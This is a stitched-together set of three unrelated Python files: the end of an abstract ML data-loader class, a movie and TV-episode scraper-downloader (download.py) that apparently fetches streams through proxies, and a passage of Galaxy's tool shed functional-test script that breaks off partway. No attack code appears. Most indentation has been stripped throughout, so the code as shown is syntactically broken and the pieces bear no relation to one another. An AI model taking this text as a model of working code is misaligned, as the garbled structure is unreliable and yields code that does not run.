        :param shuffled: to shuffle or not to shuffle indices
        :param seeded: if not None, should return the same n samples every call,
with the disclaimer that for a split that is written over many
files, this will only guarantee the same samples for the same
loaded file
:return: a (n, *sample) array
"""
if seeded is not None:
np.random.seed(int(seeded))
if shuffled:
indices = np.random.permutation(self.splits[split_name].current_len)[:n]
else:
indices = list(range(n))
if seeded is not None:
np.random.seed()
for i in range(0, n, batch_size):
end_idx = i + batch_size if i + batch_size < n else n
samples = []
for idx in indices[i:end_idx]:
sample = self.get_sample(self.splits[split_name].current, idx)
                for j, element in enumerate(sample):
                    if len(samples) == j:
                        samples.append([element])
                    else:
                        samples[j].append(element)
samples = [np.array(element) for element in samples]
yield self.preprocess_batch(samples)
@check_if_split_is_ready
def get_all_data_from(self, split_name):
"""Return the split's (split_name) data from current loaded file.
This is not the same as returning the entire set, as it regards only
the current loaded file.
"""
return self.preprocess_batch(self.get_n_samples_from(
split_name, n=self.splits[split_name].current_len))
def preprocess_batch(self, samples):
"""Hook for child loaders to add some preprocessing to batches
"""
return samples
@classmethod
@abstractmethod
def default_hparams(cls):
"""Children should provide their own list of hparams. These should
regard preprocessing styles and data formatting in general
"""
pass
@abstractmethod
def get_data_splits(self):
"""Return a list of DatasetSplit objects, containing the name and
the list of file for each split of the dataset
"""
pass
@abstractmethod
def get_sample(self, data, idx):
"""Return a single sample, using idx as a reference. This should be
a complete sample, containing all data (e.g. labels and images)
"""
pass
@abstractmethod
def reshuffle_file_indices(self, split_name, filenames):
"""Return a shuffled list of indices referencing the files on
the filenames list. Use the split_name to control how to shuffle
(e.g. train splits are shuffled and test splits are not)
"""
pass
@abstractmethod
def reshuffle_sample_indices(self, split_name, data):
"""Return a shuffled list of indices referencing the data on
the data parameter. Use the split_name to control how to shuffle
(e.g. train splits are shuffled and test splits are not)
"""
pass
@abstractmethod
def load_next_megabatch(self, split_name, selected_file):
"""Load the selected file, do any necessary preprocessing on the data
and finally call set_future_data_for_split with the resulting data.
This will guarantee that parallel loading keeps loading different files
"""
pass
def did_swap_megabatches(self, split):
"""Maybe the child wants to do something after a swap (?)
"""
pass
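# A minimal concrete loader (illustrative sketch only; the NpyDataLoader name, the
# file layout and the hparams are assumptions, not part of this module). It shows
# the contract a child must fulfil: provide splits, per-sample access, shuffling
# policies, and hand each loaded file to set_future_data_for_split.
import os
class NpyDataLoader(BaseDataLoader):
    name = "npy_loader"
    @classmethod
    def default_hparams(cls):
        # Plain dict for the sketch; BaseDataLoader.__init__ accepts dicts directly.
        return {"batch_size": 32}
    def get_data_splits(self):
        files = sorted(os.path.join(self.data_directory, f)
                       for f in os.listdir(self.data_directory) if f.endswith(".npy"))
        return [DatasetSplit("train", files)]
    def get_sample(self, data, idx):
        # Each sample is a (features, label) pair taken from the loaded arrays.
        return data["x"][idx], data["y"][idx]
    def reshuffle_file_indices(self, split_name, filenames):
        return list(np.random.permutation(len(filenames)))
    def reshuffle_sample_indices(self, split_name, data):
        return list(np.random.permutation(len(data["y"])))
    def load_next_megabatch(self, split_name, selected_file):
        # Assumes each .npy file stores a dict-like object with "x" and "y" arrays.
        self.set_future_data_for_split(split_name, np.load(selected_file, allow_pickle=True).item())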
|
download.py
|
# -*- coding: utf-8 -*-
# filename : download.py
# description : Handles downloading of movies
# author : LikeToAccess
# email : liketoaccess@protonmail.com
# date : 08-01-2021
# version : v2.0
# usage : python main.py
# notes :
# license : MIT
# py version : 3.8.2 (must run on 3.6 or higher)
#==============================================================================
import os
from threading import Thread
import requests
from requests.exceptions import *
from urllib3.exceptions import SSLError
from scraper import Scraper
from stream import Stream
import config as cfg
import media
from media import log
headers = {"user-agent": cfg.user_agent}
resolution_list = cfg.video_quality
media_files = media.Media("MOVIES")
home = os.getcwd()
requests.adapters.HTTPAdapter(max_retries=cfg.max_retries)
def url_format(url, target_res, old_res="360"):
url = url.replace(f"/{old_res}?name=",f"/{target_res}?name=")
url = url.replace(f"_{old_res}&token=ip=",f"_{target_res}&token=ip=")
return url
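# Example of the rewrite performed above (hypothetical URL, for illustration only):
#   url_format("https://host/360?name=clip_360&token=ip=1.2.3.4", "1080")
#   -> "https://host/1080?name=clip_1080&token=ip=1.2.3.4"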
def validate_url(url, target_res=None):
if target_res:
url = url_format(url, target_res)
error_message = ""
try:
request = requests.get(
url,
headers=headers,
proxies=(cfg.proxy if cfg.proxy else None),
stream=True,
timeout=(30,60)
)
status_code = request.status_code
except ConnectionError:
error_message = " (check the port on the proxy?)"
status_code = 403
request = None
print(f"STATUS for {target_res}p: {status_code}{error_message}" if target_res else None)
return status_code, request
class Download:
def __init__(self, url, metadata, author):
self.url = url
self.metadata = metadata
self.author = author
def best_quality(self, url):
if not url:
log("ERROR: No URL! Maybe there were no search results?", silent=False)
return False, None, None
if not isinstance(url, str):
url = url.get_attribute("src")
valid_resolutions = []
        for target_res in resolution_list: # TODO: The process of checking every resolution's status code takes too long (fix me)
valid_resolution, request = validate_url(url, target_res)
valid_resolutions.append(valid_resolution)
if valid_resolutions[-1] == 200:
url = url_format(url, target_res)
break
if valid_resolutions[-1] == 403:
filmname = self.metadata["data-filmname"]
log(f"ERROR: Link expired while scraping \"{filmname}\".")
return False, None, None
if 200 not in valid_resolutions:
log(f"ERROR: Status code {valid_resolutions[-1]}.")
return False, None, None
return url, request, target_res
def run(self, resolution_override=None):
        # Function should return True when the download is complete and False if it permanently failed
self.url, request, resolution = self.best_quality(self.url)
if self.url is False:
return False
filmname = self.metadata["data-filmname"]
year = self.metadata["data-year"]
if "Season" in filmname and "Episode" in filmname:
print("Media is detected as TV Show.")
show_title = filmname.split(" - ")[0]
season = filmname.split(" - Season ")[1].split(" Episode")[0].split(" [")[0]
season = season if len(season) >= 2 else "0" + season
episode = filmname.split(" Episode ")[1].split(": ")[0]
try:
episode_title = filmname.split(": ")[(1 if " [" not in filmname else 2)]
# filename = f"{show_title} - s{season}ep{episode} - {episode_title}"
filename = f"{show_title} - s{season}ep{episode}"
except IndexError:
filename = f"{show_title} - s{season}ep{episode}"
absolute_path = os.path.abspath(
f"../TV SHOWS/{show_title}/Season {season}/{filename}.crdownload"
)
else:
print("Media is detected as Movie/Film.")
filename = (f"{filmname} ({year})" if filmname[-1] != ")" else filmname)
absolute_path = os.path.abspath(f"../MOVIES/{filename}/{filename}.crdownload")
stream = Stream(
request,
absolute_path,
(
resolution_override if resolution_override else resolution
),
)
stream.stream()
filename = filename.replace(".crdownload", ".mp4")
file_size = round(int(request.headers.get("content-length", 0))/1024/1024,2)
media.credit(self.author, filename=filename, resolution=resolution, file_size=file_size)
log(f"Finished download of {filename} in {resolution}p ({file_size} MB).", silent=False)
return True
if __name__ == "__main__":
def run_download(url, metadata, author):
download_function = Download(url, metadata, author)
threaded_download = Thread(target=download_function.run)
threaded_download.start()
scraper = Scraper(minimize=False)
search = input("Enter a Title to search for:\n> ")
while search:
download_queue = scraper.download_first_from_search(search)
if download_queue:
for data in download_queue:
if None in data:
log("No results!", silent=False)
run_download(data[0], data[1][list(data[1])[0]], data[2])
search = input("Enter a Title to search for:\n> ")
else:
log("No results!", silent=False)
|
functional_tests.py
|
#!/usr/bin/env python
# NOTE: This script cannot be run directly, because it needs to have test/functional/test_toolbox.py in sys.argv in
# order to run functional tests on repository tools after installation. The install_and_test_tool_shed_repositories.sh
# will execute this script with the appropriate parameters.
import os, sys, shutil, tempfile, re, string, urllib, platform
from time import strftime
# Assume we are run from the galaxy root directory, add lib to the python path
cwd = os.getcwd()
sys.path.append( cwd )
test_home_directory = os.path.join( cwd, 'test', 'install_and_test_tool_shed_repositories' )
default_test_file_dir = os.path.join( test_home_directory, 'test_data' )
# Here's the directory where everything happens. Temporary directories are created within this directory to contain
# the database, new repositories, etc.
galaxy_test_tmp_dir = os.path.join( test_home_directory, 'tmp' )
default_galaxy_locales = 'en'
default_galaxy_test_file_dir = "test-data"
os.environ[ 'GALAXY_INSTALL_TEST_TMP_DIR' ] = galaxy_test_tmp_dir
new_path = [ os.path.join( cwd, "lib" ), os.path.join( cwd, 'test' ), os.path.join( cwd, 'scripts', 'api' ) ]
new_path.extend( sys.path )
sys.path = new_path
from galaxy import eggs
eggs.require( "nose" )
eggs.require( "NoseHTML" )
eggs.require( "NoseTestDiff" )
eggs.require( "twill==0.9" )
eggs.require( "Paste" )
eggs.require( "PasteDeploy" )
eggs.require( "Cheetah" )
eggs.require( "simplejson" )
# This should not be required, but it is under certain conditions, thanks to this bug: http://code.google.com/p/python-nose/issues/detail?id=284
eggs.require( "pysqlite" )
import install_and_test_tool_shed_repositories.functional.test_install_repositories as test_install_repositories
import install_and_test_tool_shed_repositories.base.test_db_util as test_db_util
import functional.test_toolbox as test_toolbox
import atexit, logging, simplejson
import twill, unittest, time
import threading, random
import httplib, socket
from paste import httpserver
# This is for the galaxy application.
import galaxy.app
from galaxy.app import UniverseApplication
from galaxy.web import buildapp
from galaxy.util import parse_xml
from galaxy.util.json import from_json_string, to_json_string
from tool_shed.util.shed_util_common import url_join
import nose.core
import nose.config
import nose.loader
import nose.plugins.manager
from nose.plugins import Plugin
from base.util import parse_tool_panel_config, get_database_version, get_test_environment, get_repository_current_revision
from common import update
log = logging.getLogger( 'install_and_test_repositories' )
default_galaxy_test_port_min = 10000
default_galaxy_test_port_max = 10999
default_galaxy_test_host = '127.0.0.1'
# Optionally, set the environment variable GALAXY_INSTALL_TEST_TOOL_SHEDS_CONF
# to the location of a tool sheds configuration file that includes the tool shed
# that repositories will be installed from.
tool_sheds_conf_xml = '''<?xml version="1.0"?>
<tool_sheds>
<tool_shed name="Galaxy main tool shed" url="http://toolshed.g2.bx.psu.edu/"/>
<tool_shed name="Galaxy test tool shed" url="http://testtoolshed.g2.bx.psu.edu/"/>
</tool_sheds>
'''
# Create a blank shed_tool_conf.xml to hold the installed repositories.
shed_tool_conf_xml_template = '''<?xml version="1.0"?>
<toolbox tool_path="${shed_tool_path}">
</toolbox>
'''
# Since we will be running functional tests, we'll need the upload tool, but the rest can be omitted.
tool_conf_xml = '''<?xml version="1.0"?>
<toolbox>
<section name="Get Data" id="getext">
<tool file="data_source/upload.xml"/>
</section>
</toolbox>
'''
# If we have a tool_data_table_conf.test.xml, set it up to be loaded when the UniverseApplication is started.
# This allows one to specify a set of tool data that is used exclusively for testing, and not loaded into any
# Galaxy instance. By default, this will be in the test-data-repo/location directory generated by buildbot_setup.sh.
if os.path.exists( 'tool_data_table_conf.test.xml' ):
additional_tool_data_tables = 'tool_data_table_conf.test.xml'
additional_tool_data_path = os.environ.get( 'GALAXY_INSTALL_TEST_EXTRA_TOOL_DATA_PATH', os.path.join( 'test-data-repo', 'location' ) )
else:
additional_tool_data_tables = None
additional_tool_data_path = None
# Also set up default tool data tables.
if os.path.exists( 'tool_data_table_conf.xml' ):
tool_data_table_conf = 'tool_data_table_conf.xml'
elif os.path.exists( 'tool_data_table_conf.xml.sample' ):
tool_data_table_conf = 'tool_data_table_conf.xml.sample'
else:
tool_data_table_conf = None
# And set up a blank shed_tool_data_table_conf.xml.
tool_data_table_conf_xml_template = '''<?xml version="1.0"?>
<tables>
</tables>
'''
# The tool shed url and api key must be set for this script to work correctly. Additionally, if the tool shed url does not
# point to one of the defaults, the GALAXY_INSTALL_TEST_TOOL_SHEDS_CONF needs to point to a tool sheds configuration file
# that contains a definition for that tool shed.
galaxy_tool_shed_url = os.environ.get( 'GALAXY_INSTALL_TEST_TOOL_SHED_URL', None )
tool_shed_api_key = os.environ.get( 'GALAXY_INSTALL_TEST_TOOL_SHED_API_KEY', None )
exclude_list_file = os.environ.get( 'GALAXY_INSTALL_TEST_EXCLUDE_REPOSITORIES', 'install_test_exclude.xml' )
if tool_shed_api_key is None:
print "This script requires the GALAXY_INSTALL_TEST_TOOL_SHED_API_KEY environment variable to be set and non-empty."
exit( 1 )
if galaxy_tool_shed_url is None:
print "This script requires the GALAXY_INSTALL_TEST_TOOL_SHED_URL environment variable to be set and non-empty."
exit( 1 )
if 'GALAXY_INSTALL_TEST_SECRET' not in os.environ:
galaxy_encode_secret = 'changethisinproductiontoo'
os.environ[ 'GALAXY_INSTALL_TEST_SECRET' ] = galaxy_encode_secret
else:
galaxy_encode_secret = os.environ[ 'GALAXY_INSTALL_TEST_SECRET' ]
testing_single_repository = {}
if 'repository_name' in os.environ and 'repository_owner' in os.environ:
testing_single_repository[ 'name' ] = os.environ[ 'repository_name' ]
testing_single_repository[ 'owner' ] = os.environ[ 'repository_owner' ]
if 'repository_revision' in os.environ:
testing_single_repository[ 'changeset_revision' ] = os.environ[ 'repository_revision' ]
else:
testing_single_repository[ 'changeset_revision' ] = None
class ReportResults( Plugin ):
'''Simple Nose plugin to record the IDs of all tests run, regardless of success.'''
name = "reportresults"
passed = dict()
def options( self, parser, env=os.environ ):
super( ReportResults, self ).options( parser, env=env )
def configure(self, options, conf):
super( ReportResults, self ).configure( options, conf )
if not self.enabled:
return
def addSuccess( self, test ):
'''Only record test IDs that correspond to tool functional tests.'''
if 'TestForTool' in test.id():
test_id = test.id()
# Rearrange the test ID to match the format that is produced in test_results.failures
test_id_parts = test_id.split( '.' )
fixed_test_id = '%s (%s)' % ( test_id_parts[ -1 ], '.'.join( test_id_parts[ :-1 ] ) )
test_parts = fixed_test_id.split( '/' )
owner = test_parts[ -4 ]
name = test_parts[ -3 ]
test_identifier = '%s/%s' % ( owner, name )
if test_identifier not in self.passed:
self.passed[ test_identifier ] = []
self.passed[ test_identifier ].append( fixed_test_id )
def getTestStatus( self, test_identifier ):
if test_identifier in self.passed:
passed_tests = self.passed[ test_identifier ]
del self.passed[ test_identifier ]
return passed_tests
return []
def execute_uninstall_method( app ):
# Clean out any generated tests.
remove_generated_tests( app )
sa_session = app.model.context.current
repositories_to_uninstall = sa_session.query( app.model.ToolShedRepository ).all()
for repository in repositories_to_uninstall:
if repository.status == app.model.ToolShedRepository.installation_status.UNINSTALLED:
continue
if repository.status not in [ app.model.ToolShedRepository.installation_status.UNINSTALLED,
app.model.ToolShedRepository.installation_status.ERROR,
app.model.ToolShedRepository.installation_status.INSTALLED ]:
repository.status = app.model.ToolShedRepository.installation_status.ERROR
sa_session.add( repository )
sa_session.flush()
name = str( repository.name )
owner = str( repository.owner )
changeset_revision = str( repository.installed_changeset_revision )
log.debug( 'Changeset revision %s of repository %s queued for uninstallation.', changeset_revision, name )
repository_dict = dict( name=name, owner=owner, changeset_revision=changeset_revision )
# Generate a test method to uninstall this repository through the embedded Galaxy application's web interface.
test_install_repositories.generate_uninstall_method( repository_dict )
# Set up nose to run the generated uninstall method as a functional test.
test_config = nose.config.Config( env=os.environ, plugins=nose.plugins.manager.DefaultPluginManager() )
test_config.configure( sys.argv )
# Run the uninstall method. This method uses the Galaxy web interface to uninstall the previously installed
# repository and delete it from disk.
result, _ = run_tests( test_config )
success = result.wasSuccessful()
return success
def get_api_url( base, parts=[], params=None, key=None ):
if 'api' in parts and parts.index( 'api' ) != 0:
parts.pop( parts.index( 'api' ) )
parts.insert( 0, 'api' )
elif 'api' not in parts:
parts.insert( 0, 'api' )
url = url_join( base, *parts )
if key:
url += '?%s' % urllib.urlencode( dict( key=key ) )
else:
url += '?%s' % urllib.urlencode( dict( key=tool_shed_api_key ) )
if params:
url += '&%s' % params
return url
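# Illustrative example of get_api_url with hypothetical values (assuming url_join simply joins the
# path segments onto the base URL):
#   get_api_url( 'http://toolshed.g2.bx.psu.edu', parts=[ 'repositories', 'abc123' ], key='secret' )
#   -> 'http://toolshed.g2.bx.psu.edu/api/repositories/abc123?key=secret'
# The 'api' segment is always moved (or inserted) to the front of the path, and if no key is given
# the module-level tool_shed_api_key is used instead.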
def get_latest_downloadable_changeset_revision( url, name, owner ):
api_url_parts = [ 'api', 'repositories', 'get_ordered_installable_revisions' ]
params = urllib.urlencode( dict( name=name, owner=owner ) )
api_url = get_api_url( url, api_url_parts, params )
changeset_revisions = json_from_url( api_url )
if changeset_revisions:
return changeset_revisions[ -1 ]
else:
return '000000000000'
def get_repository_info_from_api( url, repository_info_dict ):
parts = [ 'api', 'repositories', repository_info_dict[ 'repository_id' ] ]
api_url = get_api_url( base=url, parts=parts )
extended_dict = json_from_url( api_url )
latest_changeset_revision = get_latest_downloadable_changeset_revision( url, extended_dict[ 'name' ], extended_dict[ 'owner' ] )
extended_dict[ 'latest_revision' ] = str( latest_changeset_revision )
return extended_dict
def get_repository_tuple_from_elem( elem ):
attributes = elem.attrib
name = attributes.get( 'name', None )
owner = attributes.get( 'owner', None )
changeset_revision = attributes.get( 'changeset_revision', None )
return ( name, owner, changeset_revision )
def get_repositories_to_install( tool_shed_url, latest_revision_only=True ):
'''
Get a list of repository info dicts to install. This method expects a json list of dicts with the following structure:
[
{
"changeset_revision": <revision>,
"encoded_repository_id": <encoded repository id from the tool shed>,
"name": <name>,
"owner": <owner>,
"tool_shed_url": <url>
},
...
]
NOTE: If the tool shed URL specified in any dict is not present in the tool_sheds_conf.xml, the installation will fail.
'''
assert tool_shed_api_key is not None, 'Cannot proceed without tool shed API key.'
params = urllib.urlencode( dict( do_not_test='false',
downloadable='true',
malicious='false',
includes_tools='true',
skip_tool_test='false' ) )
api_url = get_api_url( base=tool_shed_url, parts=[ 'repository_revisions' ], params=params )
base_repository_list = json_from_url( api_url )
log.info( 'The api returned %d metadata revisions.', len( base_repository_list ) )
known_repository_ids = {}
detailed_repository_list = []
for repository_to_install_dict in base_repository_list:
# We need to get some details from the tool shed API, such as repository name and owner, to pass on to the
# module that will generate the install methods.
repository_info_dict = get_repository_info_from_api( galaxy_tool_shed_url, repository_to_install_dict )
if repository_info_dict[ 'latest_revision' ] == '000000000000':
continue
owner = repository_info_dict[ 'owner' ]
name = repository_info_dict[ 'name' ]
changeset_revision = repository_to_install_dict[ 'changeset_revision' ]
repository_id = repository_to_install_dict[ 'repository_id' ]
# We are testing deprecated repositories, because it is possible that a deprecated repository contains valid
# and functionally correct tools that someone has previously installed. Deleted repositories have never been installed,
# and therefore do not need to be checked. If they are undeleted, this script will then test them the next time it runs.
if repository_info_dict[ 'deleted' ]:
log.info( "Skipping revision %s of repository id %s (%s/%s) since the repository is deleted...",
changeset_revision,
repository_id,
name,
owner )
continue
# Now merge the dict returned from /api/repository_revisions with the detailed dict we just retrieved.
if latest_revision_only:
if changeset_revision == repository_info_dict[ 'latest_revision' ]:
detailed_repository_list.append( dict( repository_info_dict.items() + repository_to_install_dict.items() ) )
else:
detailed_repository_list.append( dict( repository_info_dict.items() + repository_to_install_dict.items() ) )
repositories_tested = len( detailed_repository_list )
if latest_revision_only:
skipped_previous = ' and metadata revisions that are not the most recent'
else:
skipped_previous = ''
if testing_single_repository:
log.info( 'Testing single repository with name %s and owner %s.',
testing_single_repository[ 'name' ],
testing_single_repository[ 'owner' ])
for repository_to_install in detailed_repository_list:
if repository_to_install[ 'name' ] == testing_single_repository[ 'name' ] \
and repository_to_install[ 'owner' ] == testing_single_repository[ 'owner' ]:
if testing_single_repository[ 'changeset_revision' ] is None:
return [ repository_to_install ]
else:
if testing_single_repository[ 'changeset_revision' ] == repository_to_install[ 'changeset_revision' ]:
return [ repository_to_install ]
return []
log.info( 'After removing deleted repositories%s from the list, %d remain to be tested.', skipped_previous, repositories_tested )
return detailed_repository_list
def get_tool_info_from_test_id( test_id ):
'''
Test IDs come in the form test_tool_number (functional.test_toolbox.TestForTool_toolshed_url/repos/owner/repository_name/tool_id/tool_version)
We want the tool ID and tool version.
'''
parts = test_id.replace( ')', '' ).split( '/' )
tool_version = parts[ -1 ]
tool_id = parts[ -2 ]
return tool_id, tool_version
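# Worked example with a hypothetical test ID of the form documented above:
#   test_id = 'test_tool_000000 (functional.test_toolbox.TestForTool_toolshed.local/repos/devteam/change_case/ChangeCase/1.0.0)'
#   get_tool_info_from_test_id( test_id )  ->  ( 'ChangeCase', '1.0.0' )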
def get_tool_test_results_from_api( tool_shed_url, metadata_revision_id ):
api_path = [ 'api', 'repository_revisions', metadata_revision_id ]
api_url = get_api_url( base=tool_shed_url, parts=api_path )
repository_metadata = json_from_url( api_url )
tool_test_results = repository_metadata.get( 'tool_test_results', {} )
# If, for some reason, the script that checks for functional tests has not run, tool_test_results will be None.
if tool_test_results is None:
return dict()
return tool_test_results
def is_latest_downloadable_revision( url, repository_info_dict ):
latest_revision = get_latest_downloadable_changeset_revision( url, name=repository_info_dict[ 'name' ], owner=repository_info_dict[ 'owner' ] )
return str( repository_info_dict[ 'changeset_revision' ] ) == str( latest_revision )
def json_from_url( url ):
url_handle = urllib.urlopen( url )
url_contents = url_handle.read()
try:
parsed_json = from_json_string( url_contents )
except:
log.exception( 'Error parsing JSON data.' )
raise
return parsed_json
def parse_exclude_list( xml_filename ):
'''
This method should return a list with the following structure:
[
{
'reason': The default reason or the reason specified in this section,
'repositories':
[
( name, owner, changeset revision if changeset revision else None ),
( name, owner, changeset revision if changeset revision else None )
]
},
{
'reason': The default reason or the reason specified in this section,
'repositories':
[
( name, owner, changeset revision if changeset revision else None ),
( name, owner, changeset revision if changeset revision else None )
]
},
]
'''
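    # Sketch of the exclude list XML this function expects, inferred from the element and attribute
    # names used below (tag names other than 'repositories', 'text' and 'repository' are assumptions):
    #   <blacklist>
    #     <repositories tool_shed="http://toolshed.g2.bx.psu.edu/">
    #       <reason>
    #         <text>Why these repositories are excluded.</text>
    #         <repository name="..." owner="..." changeset_revision="..." />
    #       </reason>
    #     </repositories>
    #   </blacklist>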
exclude_list = []
exclude_verbose = []
xml_tree = parse_xml( xml_filename )
tool_sheds = xml_tree.findall( 'repositories' )
xml_element = []
exclude_count = 0
for tool_shed in tool_sheds:
if galaxy_tool_shed_url != tool_shed.attrib[ 'tool_shed' ]:
continue
else:
xml_element = tool_shed
for reason_section in xml_element:
reason_text = reason_section.find( 'text' ).text
repositories = reason_section.findall( 'repository' )
exclude_dict = dict( reason=reason_text, repositories=[] )
for repository in repositories:
repository_tuple = get_repository_tuple_from_elem( repository )
if repository_tuple not in exclude_dict[ 'repositories' ]:
exclude_verbose.append( repository_tuple )
exclude_count += 1
exclude_dict[ 'repositories' ].append( repository_tuple )
exclude_list.append( exclude_dict )
log.debug( '%d repositories excluded from testing...', exclude_count )
if '-list_repositories' in sys.argv:
for name, owner, changeset_revision in exclude_verbose:
if changeset_revision:
log.debug( 'Repository %s owned by %s, changeset revision %s.', name, owner, changeset_revision )
else:
log.debug( 'Repository %s owned by %s, all revisions.', name, owner )
return exclude_list
def register_test_result( url, metadata_id, test_results_dict, repository_info_dict, params ):
'''
Update the repository metadata tool_test_results and appropriate flags using the API.
'''
params[ 'tool_test_results' ] = test_results_dict
if '-info_only' in sys.argv:
return {}
else:
return update( tool_shed_api_key, '%s' % ( url_join( galaxy_tool_shed_url, 'api', 'repository_revisions', metadata_id ) ), params, return_formatted=False )
def remove_generated_tests( app ):
# Delete any configured tool functional tests from the test_toolbox.__dict__, otherwise nose will find them
# and try to re-run the tests after uninstalling the repository, which will cause false failure reports,
# since the test data has been deleted from disk by now.
tests_to_delete = []
tools_to_delete = []
global test_toolbox
for key in test_toolbox.__dict__:
if key.startswith( 'TestForTool_' ):
log.info( 'Tool test found in test_toolbox, deleting: %s', key )
# We can't delete this test just yet, we're still iterating over __dict__.
tests_to_delete.append( key )
tool_id = key.replace( 'TestForTool_', '' )
for tool in app.toolbox.tools_by_id:
if tool.replace( '_', ' ' ) == tool_id.replace( '_', ' ' ):
tools_to_delete.append( tool )
for key in tests_to_delete:
# Now delete the tests found in the previous loop.
del test_toolbox.__dict__[ key ]
for tool in tools_to_delete:
del app.toolbox.tools_by_id[ tool ]
def run_tests( test_config ):
loader = nose.loader.TestLoader( config=test_config )
test_config.plugins.addPlugin( ReportResults() )
plug_loader = test_config.plugins.prepareTestLoader( loader )
if plug_loader is not None:
loader = plug_loader
tests = loader.loadTestsFromNames( test_config.testNames )
test_runner = nose.core.TextTestRunner( stream=test_config.stream,
verbosity=test_config.verbosity,
config=test_config )
plug_runner = test_config.plugins.prepareTestRunner( test_runner )
if plug_runner is not None:
test_runner = plug_runner
result = test_runner.run( tests )
return result, test_config.plugins._plugins
def show_summary_output( repository_info_dicts ):
repositories_by_owner = dict()
for repository in repository_info_dicts:
if repository[ 'owner' ] not in repositories_by_owner:
repositories_by_owner[ repository[ 'owner' ] ] = []
repositories_by_owner[ repository[ 'owner' ] ].append( repository )
for owner in repositories_by_owner:
print "# "
for repository in repositories_by_owner[ owner ]:
print "# %s owned by %s, changeset revision %s" % ( repository[ 'name' ], repository[ 'owner' ], repository[ 'changeset_revision' ] )
def main():
# ---- Configuration ------------------------------------------------------
galaxy_test_host = os.environ.get( 'GALAXY_INSTALL_TEST_HOST', default_galaxy_test_host )
galaxy_test_port = os.environ.get( 'GALAXY_INSTALL_TEST_PORT', str( default_galaxy_test_port_max ) )
tool_path = os.environ.get( 'GALAXY_INSTALL_TEST_TOOL_PATH', 'tools' )
if 'HTTP_ACCEPT_LANGUAGE' not in os.environ:
os.environ[ 'HTTP_ACCEPT_LANGUAGE' ] = default_galaxy_locales
galaxy_test_file_dir = os.environ.get( 'GALAXY_INSTALL_TEST_FILE_DIR', default_galaxy_test_file_dir )
if not os.path.isabs( galaxy_test_file_dir ):
galaxy_test_file_dir = os.path.abspath( galaxy_test_file_dir )
use_distributed_object_store = os.environ.get( 'GALAXY_INSTALL_TEST_USE_DISTRIBUTED_OBJECT_STORE', False )
if not os.path.isdir( galaxy_test_tmp_dir ):
os.mkdir( galaxy_test_tmp_dir )
galaxy_test_proxy_port = None
# Set up the configuration files for the Galaxy instance.
shed_tool_data_table_conf_file = os.environ.get( 'GALAXY_INSTALL_TEST_SHED_TOOL_DATA_TABLE_CONF', os.path.join( galaxy_test_tmp_dir, 'test_shed_tool_data_table_conf.xml' ) )
galaxy_tool_data_table_conf_file = os.environ.get( 'GALAXY_INSTALL_TEST_TOOL_DATA_TABLE_CONF', tool_data_table_conf )
galaxy_tool_conf_file = os.environ.get( 'GALAXY_INSTALL_TEST_TOOL_CONF', os.path.join( galaxy_test_tmp_dir, 'test_tool_conf.xml' ) )
galaxy_shed_tool_conf_file = os.environ.get( 'GALAXY_INSTALL_TEST_SHED_TOOL_CONF', os.path.join( galaxy_test_tmp_dir, 'test_shed_tool_conf.xml' ) )
galaxy_migrated_tool_conf_file = os.environ.get( 'GALAXY_INSTALL_TEST_MIGRATED_TOOL_CONF', os.path.join( galaxy_test_tmp_dir, 'test_migrated_tool_conf.xml' ) )
galaxy_tool_sheds_conf_file = os.environ.get( 'GALAXY_INSTALL_TEST_TOOL_SHEDS_CONF', os.path.join( galaxy_test_tmp_dir, 'test_tool_sheds_conf.xml' ) )
galaxy_shed_tools_dict = os.environ.get( 'GALAXY_INSTALL_TEST_SHED_TOOL_DICT_FILE', os.path.join( galaxy_test_tmp_dir, 'shed_tool_dict' ) )
file( galaxy_shed_tools_dict, 'w' ).write( to_json_string( dict() ) )
if 'GALAXY_INSTALL_TEST_TOOL_DATA_PATH' in os.environ:
tool_data_path = os.environ.get( 'GALAXY_INSTALL_TEST_TOOL_DATA_PATH' )
else:
tool_data_path = tempfile.mkdtemp( dir=galaxy_test_tmp_dir )
os.environ[ 'GALAXY_INSTALL_TEST_TOOL_DATA_PATH' ] = tool_data_path
# Configure the database connection and path.
if 'GALAXY_INSTALL_TEST_DBPATH' in os.environ:
galaxy_db_path = os.environ[ 'GALAXY_INSTALL_TEST_DBPATH' ]
else:
tempdir = tempfile.mkdtemp( dir=galaxy_test_tmp_dir )
galaxy_db_path = os.path.join( tempdir, 'database' )
# Configure the paths Galaxy needs to install and test tools.
galaxy_file_path = os.path.join( galaxy_db_path, 'files' )
new_repos_path = tempfile.mkdtemp( dir=galaxy_test_tmp_dir )
galaxy_tempfiles = tempfile.mkdtemp( dir=galaxy_test_tmp_dir )
galaxy_shed_tool_path = tempfile.mkdtemp( dir=galaxy_test_tmp_dir, prefix='shed_tools' )
galaxy_migrated_tool_path = tempfile.mkdtemp( dir=galaxy_test_tmp_dir )
# Set up the tool dependency path for the Galaxy instance.
tool_dependency_dir = os.environ.get( 'GALAXY_INSTALL_TEST_TOOL_DEPENDENCY_DIR', None )
if tool_dependency_dir is None:
tool_dependency_dir = tempfile.mkdtemp( dir=galaxy_test_tmp_dir )
os.environ[ 'GALAXY_INSTALL_TEST_TOOL_DEPENDENCY_DIR' ] = tool_dependency_dir
if 'GALAXY_INSTALL_TEST_DBURI' in os.environ:
database_connection = os.environ[ 'GALAXY_INSTALL_TEST_DBURI' ]
else:
database_connection = 'sqlite:///' + os.path.join( galaxy_db_path, 'install_and_test_repositories.sqlite' )
kwargs = {}
for dir in [ galaxy_test_tmp_dir ]:
try:
os.makedirs( dir )
except OSError:
pass
print "Database connection: ", database_connection
# Generate the shed_tool_data_table_conf.xml file.
file( shed_tool_data_table_conf_file, 'w' ).write( tool_data_table_conf_xml_template )
os.environ[ 'GALAXY_INSTALL_TEST_SHED_TOOL_DATA_TABLE_CONF' ] = shed_tool_data_table_conf_file
# ---- Start up a Galaxy instance ------------------------------------------------------
# Generate the tool_conf.xml file.
file( galaxy_tool_conf_file, 'w' ).write( tool_conf_xml )
    # Generate the tool_sheds_conf.xml file, but only if the user has not specified an existing one in the environment.
if 'GALAXY_INSTALL_TEST_TOOL_SHEDS_CONF' not in os.environ:
file( galaxy_tool_sheds_conf_file, 'w' ).write( tool_sheds_conf_xml )
# Generate the shed_tool_conf.xml file.
tool_conf_template_parser = string.Template( shed_tool_conf_xml_template )
shed_tool_conf_xml = tool_conf_template_parser.safe_substitute( shed_tool_path=galaxy_shed_tool_path )
file( galaxy_shed_tool_conf_file, 'w' ).write( shed_tool_conf_xml )
os.environ[ 'GALAXY_INSTALL_TEST_SHED_TOOL_CONF' ] = galaxy_shed_tool_conf_file
# Generate the migrated_tool_conf.xml file.
